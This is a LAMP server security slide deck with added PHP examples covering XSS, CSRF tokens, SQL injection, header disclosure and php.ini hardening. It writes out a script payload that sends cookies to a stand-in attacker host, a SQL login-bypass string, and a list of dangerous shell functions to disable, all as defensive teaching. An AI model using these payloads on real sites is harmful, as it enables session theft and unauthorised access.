LAMP security practices
- 1. LAMP Security Practices
XSS
Request Forgeries
SQL Injection
Disable PHP, Apache, OS information
Disable unnecessary modules
Log PHP errors
Disable/Limit file uploads
DoS attack
Remote Code execution
Disable dangerous PHP functions
Limit access to file system
- 2. XSS
A hacker posts the code snippet below in the comment section of the website
http://exsite.com:
Hello Everyone!<script>document.write('<img src="http://evilhacker.org/?' + document.cookie + '">');</script>
Because the comment is echoed back into the page unencoded, the script
runs in my browser whenever I open the website http://exsite.com and
transfers my cookie data to the hacker's site (http://evilhacker.org):-
Note that the cookie data may carry my session identifier or login
credentials, which you as a hacker can use to
- 3. XSS solution
Never emit user-submitted content into a page unencoded. Encode it for
the context it lands in: for HTML body text and attribute values,
htmlspecialchars($s, ENT_QUOTES, 'UTF-8') turns <, >, ", ' and & into
entities, so the browser renders them as text instead of markup.
Stripping <, > and HTML tags from the input is a weaker fallback: it
mangles legitimate text and does nothing for injection into attribute or
JavaScript contexts, so use it only in addition to output encoding, never
instead of it.
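The contrast between encoding and stripping, as an added example that is not part of the original deck. The comment payload is the one from slide 2; the helper names (h, render_comment, attr_stripped) and the attribute-injection input are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example, not the deck's code: output-encode user content per
// context instead of trying to remove "bad" characters on input.

/** Encode for HTML element content or a quoted attribute value.
 *  ENT_QUOTES also encodes ' so single-quoted attributes are covered;
 *  the charset must match the page's Content-Type (assumed UTF-8). */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render one comment, encoding both the attribute and the body. */
function render_comment(string $author, string $body): string
{
    return '<div class="comment" data-author="' . h($author) . '">'
         . '<p>' . h($body) . '</p></div>';
}

/** The slide-3 approach: strip tags and emit the rest. strip_tags() only
 *  knows about <...> elements, so an attribute-context payload survives. */
function attr_stripped(string $author): string
{
    return '<div class="comment" data-author="' . strip_tags($author) . '">';
}

// Constructed input: the slide-2 cookie-stealing comment.
$payload = <<<'JS'
Hello Everyone!<script>document.write('<img src="http://evilhacker.org/?' + document.cookie + '">');</script>
JS;

$safe = render_comment('mallory', $payload);
assert(!str_contains($safe, '<script'));          // no executable markup left
assert(str_contains($safe, '&lt;script&gt;'));   // rendered as visible text

// Constructed attribute-breakout input: no tags at all, so stripping
// leaves it intact, while encoding neutralises the closing quote.
$attr = 'x" onmouseover="alert(1)';
assert(str_contains(attr_stripped($attr), 'onmouseover="alert(1)'));
assert(!str_contains(render_comment($attr, 'hi'), 'onmouseover="'));
assert(str_contains(render_comment($attr, 'hi'), 'x&quot; onmouseover=&quot;alert(1)'));

echo render_comment($attr, $payload), "\n";
```

Run with `php -d zend.assertions=1 xss.php`; the printed comment contains the payload as inert text. Content inside `<script>` blocks or URL parameters needs its own encoder (json_encode with JSON_HEX_TAG and friends, or rawurlencode), which is why the rule is per-context encoding rather than one global filter.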
- 4. Request Forgeries
Create, Update and Delete requests should be
ensured to have originally generated from your
application
Ex. Don't expose a plain URL like
http://mysite.com/photos/delete/photo_id
to delete a photo: any page the victim visits can make the browser fetch
it with the victim's cookies attached. Instead require a per-session
secret (a CSRF token) that is valid for a predefined time, and have the
delete handler compare the submitted value with the stored one before
acting. State-changing actions should also be sent with POST, not GET.
Check the code below (md5 over uniqid() is not a cryptographic random
source; on PHP 7+ use random_bytes()):-
$_SESSION['signature'] = md5(uniqid(rand(), true) . $username);
$_SESSION['signature_timestamp'] = time();
echo "<a href='http://mysite.com/photos/delete/photo_id?signature={$_SESSION['signature']}'>";
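A complete token issue-and-verify cycle for the delete action, as an added example that is not from the original deck. It swaps the slide's md5(uniqid()) for random_bytes(), checks the token with hash_equals() and makes it single-use; the session is passed in as an array instead of $_SESSION so the script runs from the CLI, and the 15-minute lifetime, the form action and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the deck's code: CSRF token bound to the session
// and user, time-limited, single-use, compared in constant time.

const CSRF_TTL = 900;   // assumed token lifetime in seconds

function csrf_issue(array &$session, string $username): string
{
    $token = bin2hex(random_bytes(32));     // CSPRNG, unlike rand()/md5()
    $session['csrf'] = [
        'token'   => $token,
        'user'    => $username,
        'expires' => time() + CSRF_TTL,
    ];
    return $token;
}

function csrf_verify(array &$session, string $username, ?string $submitted): bool
{
    $rec = $session['csrf'] ?? null;
    unset($session['csrf']);                // consume it whatever happens
    if ($rec === null || $submitted === null) {
        return false;
    }
    if ($rec['user'] !== $username || time() > $rec['expires']) {
        return false;                       // wrong user or expired
    }
    return hash_equals($rec['token'], $submitted);   // no timing side channel
}

/** Emit the delete form: POST, with the token as a hidden field. */
function delete_photo_form(array &$session, string $username, int $photoId): string
{
    $t = csrf_issue($session, $username);
    return '<form method="post" action="/photos/delete">'
         . '<input type="hidden" name="photo_id" value="' . $photoId . '">'
         . '<input type="hidden" name="csrf" value="' . $t . '">'
         . '<button>Delete</button></form>';
}

/** The handler: refuse the request unless the token verifies. */
function handle_delete(array &$session, string $username, array $post): bool
{
    if (!csrf_verify($session, $username, $post['csrf'] ?? null)) {
        return false;                       // would respond 403 in a real app
    }
    return true;                            // delete photo $post['photo_id'] here
}

// Constructed walk-through.
$session = [];
$html = delete_photo_form($session, 'alice', 42);
preg_match('/name="csrf" value="([0-9a-f]{64})"/', $html, $m);

assert(handle_delete($session, 'alice', ['photo_id' => '42', 'csrf' => $m[1]]) === true);
assert(handle_delete($session, 'alice', ['photo_id' => '42', 'csrf' => $m[1]]) === false); // replayed
csrf_issue($session, 'alice');
assert(handle_delete($session, 'alice', ['photo_id' => '42']) === false);                   // token missing
csrf_issue($session, 'alice');
assert(handle_delete($session, 'bob', ['photo_id' => '42', 'csrf' => $session['csrf']['token']]) === false); // wrong user
echo "csrf checks ok\n";
```

Run with `php -d zend.assertions=1 csrf.php`. In a real application the token is read from `$_SESSION` after `session_start()`, and the session cookie should additionally carry `SameSite=Lax` or `Strict` so that cross-site requests do not send it in the first place.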
- 6. SQL Injection
Ex. Input ' OR '1'='1 in the userid field of a login form. If the server
script for authentication builds the query by interpolation,
"SELECT * FROM tblusers WHERE userid = '{$_GET['userid']}'",
the string PHP sends to MySQL becomes
SELECT * FROM tblusers WHERE userid = '' OR '1'='1'
which is true for every row, so valid records are returned from the
database and a login check that only tests for a returned row is bypassed.
- 7. SQL Injection Solution
Prefer prepared statements with bound parameters for every query that
carries user-supplied data; the value travels separately from the SQL
text and can never change the query's structure:-
$statement = $connection->prepare("SELECT * FROM tblusers WHERE userid = ?");
$statement->bind_param("s", $_GET['userid']);  // "s": userid is a string column; use "i" only for integer columns
$statement->execute();
If a query string must be built by hand, escape with the connection-aware
function mysqli_real_escape_string($connection, $_GET['userid']) and
only ever place the result inside a quoted string literal; escaping does
nothing for unquoted numeric positions, column names or ORDER BY clauses.
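The slide-6 bypass and the slide-7 fix side by side, as an added example that is not from the original deck. It uses PDO with an in-memory SQLite database (assumed available through pdo_sqlite) so it runs without a MySQL server; the table rows are constructed, and the same bind pattern applies to mysqli prepared statements.

```php
<?php
declare(strict_types=1);

// Added example, not the deck's code: show that the deck's payload leaks
// every row through string interpolation and nothing through binding.

function setup(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // real prepare/bind, no client-side quoting
    ]);
    $db->exec('CREATE TABLE tblusers (userid TEXT PRIMARY KEY, pwhash TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO tblusers (userid, pwhash) VALUES (?, ?)');
    foreach (['alice', 'bob', 'carol'] as $u) {            // constructed rows
        $ins->execute([$u, password_hash("pw-$u", PASSWORD_DEFAULT)]);
    }
    return $db;
}

/** Slide 6: interpolation. Attacker-supplied quotes rewrite the query. */
function lookup_vulnerable(PDO $db, string $userid): array
{
    $sql = "SELECT userid FROM tblusers WHERE userid = '$userid'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

/** Slide 7: parameter binding. The value is data, never SQL syntax. */
function lookup_prepared(PDO $db, string $userid): array
{
    $st = $db->prepare('SELECT userid FROM tblusers WHERE userid = ?');
    $st->execute([$userid]);
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

$db = setup();
$payload = "' OR '1'='1";                 // the deck's login-bypass input

assert(lookup_vulnerable($db, 'alice') === ['alice']);
assert(count(lookup_vulnerable($db, $payload)) === 3);  // every user returned
assert(lookup_prepared($db, 'alice') === ['alice']);
assert(lookup_prepared($db, $payload) === []);          // no user is literally named that

printf("vulnerable: %d rows, prepared: %d rows\n",
    count(lookup_vulnerable($db, $payload)), count(lookup_prepared($db, $payload)));
```

Run with `php -d zend.assertions=1 sqli.php`. Keeping `ATTR_EMULATE_PREPARES` off matters on MySQL too: with emulation on, PDO quotes the value client-side and sends a single string, which is safe only if the connection charset is set correctly.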
- 8. Disable PHP information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
The X-Powered-By header tells an attacker that the site runs PHP and
exactly which version, which is enough to look up version-specific bugs.
Remove the header by setting expose_php = Off in php.ini and restarting
the web server; re-run curl -I to confirm it is gone.
- 9. Disable Server Information
Run the command:
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
The Server header reveals Apache, its exact version and the Ubuntu OS;
ServerSignature additionally prints the same details on error pages.
Suppress this information by setting
ServerSignature Off
ServerTokens Prod
in /etc/apache2/conf.d/security on Ubuntu or in httpd.conf elsewhere.
With ServerTokens Prod the header still says Server: Apache, but the
version and OS are gone.
- 10. Disable unnecessary modules
Use php -m to list the enabled modules.
Disable modules you do not need, for example gd when the site does no
image processing: every loaded extension is extra attack surface.
On Ubuntu, go to the folder /etc/php5/conf.d and run:
sudo mv gd.{ini,disable}
This renames gd.ini to gd.disable, so the gd module is no longer loaded
with PHP. Restart the web server and confirm with php -m.
- 11. Log PHP errors
Use the following setting so that PHP error messages (which leak file
paths, query fragments and stack details) are not displayed to site users:
display_errors = Off
Use the following to log the PHP error messages to a file instead:
log_errors = On
error_log = /var/log/httpd/php-error.log
The log file must live outside the web root and be readable only by the
web server user, since it will contain the same details you just hid.
For real-time monitoring of the PHP error log use:-
tail -f /var/log/httpd/php-error.log
- 12. Disable File Uploads
If your site does not need file upload functionality, turn it off in
php.ini:-
file_uploads = Off
If your site needs it, keep the limits at the minimum you actually
require:-
file_uploads = On
upload_max_filesize = 1M
post_max_size must be at least as large as upload_max_filesize, otherwise
a request carrying the upload arrives with empty $_POST and $_FILES.
Uploaded files should also be validated by type, stored outside the web
root and saved under a name the server chooses, never the client's.
- 13. DoS attack
To stop a single runaway or deliberately slow request from consuming CPU
and memory indefinitely and bringing down the server, use the following
settings:-
max_execution_time = 30
max_input_time = 30
memory_limit = 40M
These are per-request ceilings on script time, request-parsing time and
memory. They limit the damage one request can do; they do not protect
against many concurrent requests, which needs rate limiting at the web
server or in front of it.
- 14. Remote Code Execution
Remote URLs can be opened by PHP functions like fopen, file_get_contents,
include and require. When the URL or path comes from user input that the
programmer did not filter carefully, include/require of a remote URL
executes attacker-controlled code on the server, and fopen or
file_get_contents of a remote URL can leak data or be abused to reach
internal services.
To restrict remote file opening:-
allow_url_fopen = Off
allow_url_include = Off
Turning these off does not stop a local file inclusion: never pass user
input to include or require even for local paths.
- 15. Disable Dangerous PHP functions
Use the following directive to disable PHP functions that are very
powerful, dangerous and not normally required when PHP runs under a web
server:-
disable_functions = exec, passthru, shell_exec, system, proc_open, popen,
curl_exec, curl_multi_exec, parse_ini_file, show_source
disable_functions can only be set in php.ini, not from a script, so an
attacker who gains code execution cannot re-enable them. Review the list
against your application first: curl_exec in particular is often needed
for legitimate outbound HTTP calls.
- 16. Limit Access to File System
Use the following to restrict PHP's file access to parts of the file
system:-
open_basedir = "/var/www/html/"
With this set, PHP refuses to open files outside the listed directories,
so an injected script cannot read /etc/passwd or drop files in /tmp.
The value is a colon-separated list; include the session and upload
directories if you move them outside the web root. open_basedir is a
defence-in-depth measure, not a sandbox: file-system permissions on the
web server user remain the primary control.
- 17. Session file path
Session files and upload temporaries must be kept away from the website
folder, so they can never be served or included as part of the site. Use
the following to change their location:-
session.save_path = "/var/lib/php/session"
upload_tmp_dir = "/var/lib/php/upload"
Both directories must be writable by the web server user and by nobody
else (for example mode 0700), since session files contain every user's
session data in clear text.
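One way to check a server against the settings from slides 8 and 10 to 17 in one pass, as an added example that is not from the original deck. It compares ini_get() output (or a supplied snapshot) with the deck's hardened values and reports drift; the expected values are the deck's, while the function names, the "ceiling" interpretation of the time and memory limits and the constructed sample snapshot are assumptions. Run it through the same SAPI as the site (the CLI may load a different php.ini than Apache).

```php
<?php
declare(strict_types=1);

// Added example, not the deck's code: audit running PHP settings against
// the deck's hardening values. Requires PHP 8 (match expression).

/** Expected values from the deck, with how each should be compared. */
function expected_settings(): array
{
    return [
        'expose_php'          => ['off', 'flag'],       // slide 8
        'display_errors'      => ['off', 'flag'],       // slide 11
        'log_errors'          => ['on',  'flag'],
        'file_uploads'        => ['off', 'flag'],       // slide 12: off unless needed
        'upload_max_filesize' => ['1M',  'max_bytes'],
        'max_execution_time'  => ['30',  'max_int'],    // slide 13
        'max_input_time'      => ['30',  'max_int'],
        'memory_limit'        => ['40M', 'max_bytes'],
        'allow_url_fopen'     => ['off', 'flag'],       // slide 14
        'allow_url_include'   => ['off', 'flag'],
        'open_basedir'        => ['',    'nonempty'],   // slide 16
        'session.save_path'   => ['',    'nonempty'],   // slide 17
        'upload_tmp_dir'      => ['',    'nonempty'],
    ];
}

/** Parse php.ini shorthand such as "40M" into bytes. */
function ini_bytes(string $v): int
{
    $n = (int) $v;
    return match (strtoupper(substr(trim($v), -1))) {
        'G'     => $n * 1024 ** 3,
        'M'     => $n * 1024 ** 2,
        'K'     => $n * 1024,
        default => $n,
    };
}

/** php.ini booleans arrive as "1", "", "On", "Off"...; anything unrecognised
 *  (e.g. display_errors = "stderr") is treated as enabled. */
function ini_flag(string $v): bool
{
    return filter_var($v, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE) ?? true;
}

/** Return null when compliant, otherwise a one-line finding. */
function check_setting(string $name, string $actual, string $want, string $kind): ?string
{
    $ok = match ($kind) {
        'flag'      => ini_flag($actual) === ini_flag($want),
        'max_bytes' => $actual !== '-1' && ini_bytes($actual) <= ini_bytes($want),   // -1 = unlimited
        'max_int'   => (int) $actual > 0 && (int) $actual <= (int) $want,          // 0 = unlimited
        'nonempty'  => trim($actual) !== '',
    };
    return $ok ? null : "$name = '$actual' (expected $kind " . ($want === '' ? 'set' : $want) . ')';
}

/** Audit a snapshot, or the live configuration when none is given. */
function audit(?array $snapshot = null): array
{
    $findings = [];
    foreach (expected_settings() as $name => [$want, $kind]) {
        $actual = $snapshot === null ? (string) ini_get($name) : ($snapshot[$name] ?? '');
        if (($f = check_setting($name, $actual, $want, $kind)) !== null) {
            $findings[] = $f;
        }
    }
    if ($snapshot === null) {   // live-only checks for slides 10 and 15
        foreach (['exec', 'system', 'shell_exec', 'passthru', 'proc_open', 'popen'] as $fn) {
            if (function_exists($fn)) {        // disable_functions makes these undefined
                $findings[] = "$fn() is callable (add it to disable_functions)";
            }
        }
        if (extension_loaded('gd')) {
            $findings[] = 'gd extension is loaded (disable it if unused)';
        }
    }
    return $findings;
}

// Constructed snapshot resembling a stock php.ini, so the report can be
// seen offline; pass nothing to audit() to check the real configuration.
$sample = [
    'expose_php' => '1', 'display_errors' => 'On', 'log_errors' => '1',
    'file_uploads' => '1', 'upload_max_filesize' => '2M',
    'max_execution_time' => '30', 'max_input_time' => '60', 'memory_limit' => '128M',
    'allow_url_fopen' => '1', 'allow_url_include' => '0',
    'open_basedir' => '', 'session.save_path' => '/var/lib/php/session', 'upload_tmp_dir' => '',
];
assert(count(audit($sample)) === 8);
foreach (audit($sample) as $f) {
    echo "FINDING: $f\n";
}
```

Against the live server, run it as the web SAPI (for example from a one-line script in a non-public directory, then delete it) so that the audited php.ini is the one Apache loads.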
- 18. Write protect conf and application
files
Use the chattr +i command to set the immutable attribute on any file:
chattr +i /etc/php5/php.ini
chattr +i /etc/mysql/my.cnf
chattr +i /etc/apache2/apache2.conf
chattr +i /var/www/html/
Such files can then not be modified, deleted or renamed, not even by the
root user, until the attribute is cleared. Note that on a directory the
flag only prevents creating, deleting or renaming entries inside it;
existing files in the directory stay writable unless they are made
immutable themselves (chattr -R +i for the whole tree).
Use chattr -i to revert the write protection before legitimate updates;
an attacker with root can do the same, so this guards against mistakes
and unprivileged tampering rather than a full compromise.